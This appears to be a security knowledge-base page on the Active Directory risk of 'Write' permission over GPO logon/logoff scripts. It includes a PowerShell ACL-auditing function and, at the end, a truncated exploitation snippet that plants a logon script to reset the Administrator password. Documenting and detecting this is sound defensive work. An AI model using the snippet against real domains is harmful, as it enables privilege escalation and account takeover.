# Write ## Summary | | | | -------------------------- | ------------------------------------ | | **FSProtect ACL Alias** | Write | | **AD Alias** | Write | | **Affected Object Types** | Files | | **Exploitation Certainty** | Unlikely | | **AD Right** | Write | | **AD Permission Guid** | 00000000-0000-0000-0000-000000000000 | ## Description The `Write` Permission on GPO Logon/Logoff Scripts in Active Directory gives an account the power to change the script files linked to Group Policy Objects (GPOs). These scripts are automatically run when users or computers log on or log off. When configured correctly, this permission lets administrators automate important tasks, enforce security settings, and streamline management across the domain. However, if the `Write` permission is misconfigured, it can introduce a critical security risk. An attacker or unauthorized user who can edit these logon/logoff scripts could embed malicious commands or code. Because these scripts may run with elevated privileges (e.g., Domain Admins), any harmful modifications can rapidly affect the network. ## Identification ### PowerShell **1.** Find-FileWrite function ```powershell function Find-FileWrite { [CmdletBinding()] param( # File or directory path. Accepts pipeline input. [Parameter(Mandatory, Position=0, ValueFromPipeline, ValueFromPipelineByPropertyName)] [Alias('FullName')] [string[]]$Path, # Scan subdirectories when Path is a directory [switch]$Recurse, # Export path [string]$OutputPath = "Write.csv", # Which rights to match [ValidateSet('FullControl','Modify','Write')] [string[]]$Rights = @('FullControl','Modify','Write'), # Include inherited ACEs (default is to exclude them) [switch]$IncludeInherited, # Limit to these extensions when scanning directories (ignored for single files) [string[]]$IncludeExtensions = @('.ps1','.psm1','.psd1','.bat','.cmd','.vbs','.js'), # If set, include all files when scanning directories (don’t filter by extension) [switch]$AllFiles) begin { $Allow = [System.Security.AccessControl.AccessControlType]::Allow $FSR = [System.Security.AccessControl.FileSystemRights] $wantFull = 'FullControl' -in $Rights $wantMod = 'Modify' -in $Rights $wantWrite = 'Write' -in $Rights $results = New-Object System.Collections.Generic.List[object] function Test-HasWantedRight { param([System.Security.AccessControl.FileSystemRights]$r) if ($wantFull -and (($r -band $FSR::FullControl) -ne 0)) { return $true } if ($wantMod -and (($r -band $FSR::Modify) -ne 0)) { return $true } if ($wantWrite -and (($r -band $FSR::Write) -ne 0)) { return $true } return $false } } process { foreach ($p in $Path) { if (-not (Test-Path -LiteralPath $p)) { Write-Warning "Path not found: $p" continue } $item = Get-Item -LiteralPath $p -ErrorAction SilentlyContinue if (-not $item) { Write-Warning "Unable to read item: $p" continue } # Build file list if ($item.PSIsContainer) { $files = if ($Recurse) { Get-ChildItem -LiteralPath $p -File -Recurse -ErrorAction SilentlyContinue } else { Get-ChildItem -LiteralPath $p -File -ErrorAction SilentlyContinue } if (-not $AllFiles) { $extHash = @{} foreach ($e in $IncludeExtensions) { $extHash[$e.ToLower()] = $true } $files = $files | Where-Object { $extHash.ContainsKey([IO.Path]::GetExtension($_.FullName).ToLower()) } } } else { $files = ,$item } foreach ($f in $files) { try { $acl = Get-Acl -LiteralPath $f.FullName } catch { Write-Warning "Failed to get ACL for $($f.FullName): $($_.Exception.Message)" continue } foreach ($ace in $acl.Access) { if ($ace.AccessControlType -ne $Allow) { continue } if (-not $IncludeInherited -and $ace.IsInherited) { continue } if (-not (Test-HasWantedRight $ace.FileSystemRights)) { continue } $results.Add([pscustomobject]@{ Path = $f.FullName Identity = $ace.IdentityReference.Value Rights = $ace.FileSystemRights IsInherited = $ace.IsInherited InheritanceFlags = $ace.InheritanceFlags PropagationFlags = $ace.PropagationFlags }) } } } } end { if ($results.Count -gt 0) { $results | Sort-Object Path, Identity | Export-Csv -Path $OutputPath -NoTypeInformation -Encoding UTF8 $results } else { Write-Verbose "No matching ACEs found." } } } ``` **2.** Scan files in a directory ```powershell Find-FileWrite -Path '\\dc\SYSVOL\Forestall.labs\\scripts\' ``` **3.** Scan files in subdirectories ```powershell Find-FileWrite -Path '\\dc\SYSVOL\Forestall.labs\\scripts\' -Recurse ``` **4.** Scan all files in the directory ```powershell Find-FileWrite -Path '\\dc\SYSVOL\Forestall.labs\\scripts\' -Recurse -AllFiles ``` **5.** Scan with a specific list of file extentions ```powershell Find-FileWrite -Path '\\dc\SYSVOL\Forestall.labs\\scripts\' -Recurse -IncludeExtensions @('.bat','.ps1') ``` **6.** Scan a specific file ```powershell Find-FileWrite -Path '\\dc\SYSVOL\Forestall.labs\scripts\test.bat' ``` ### File Manager **1.** Open `File Manager` on your Windows server. **2.** Right-click on the script. **3.** Select Properties from the context menu. **4.** In the Properties window, navigate to the Security tab. **6.** Click Edit to modify the ACEs. **7.** Click Edit to modify the ACEs.Locate and select the relevant Access Control Entry (ACE) for the user or group you wish to configure. **8.** In the permissions list, locate and check the option `Write`. **9.** Click Apply to save your changes and close the dialogs. ![File Manager](/files/rBqwzsx7x4lPENG1dQKg) ## Exploitation This permission can be exploitable on Windows systems , while on Linux systems, tools such as impacket tools can be effectively used for exploitation. Attacker can change password of Administrator user with this script. ```powershell # Script Content $scriptContent = @" $UserPassword = ConvertTo-SecureString '' -AsPlainText -Force Set-ADAccountPassword -Identity '' -NewPassword $UserPassword "@ # Path of Logon/Logoff script $networkPath = "\\\sysvol\\Policies\{}\\Scripts\\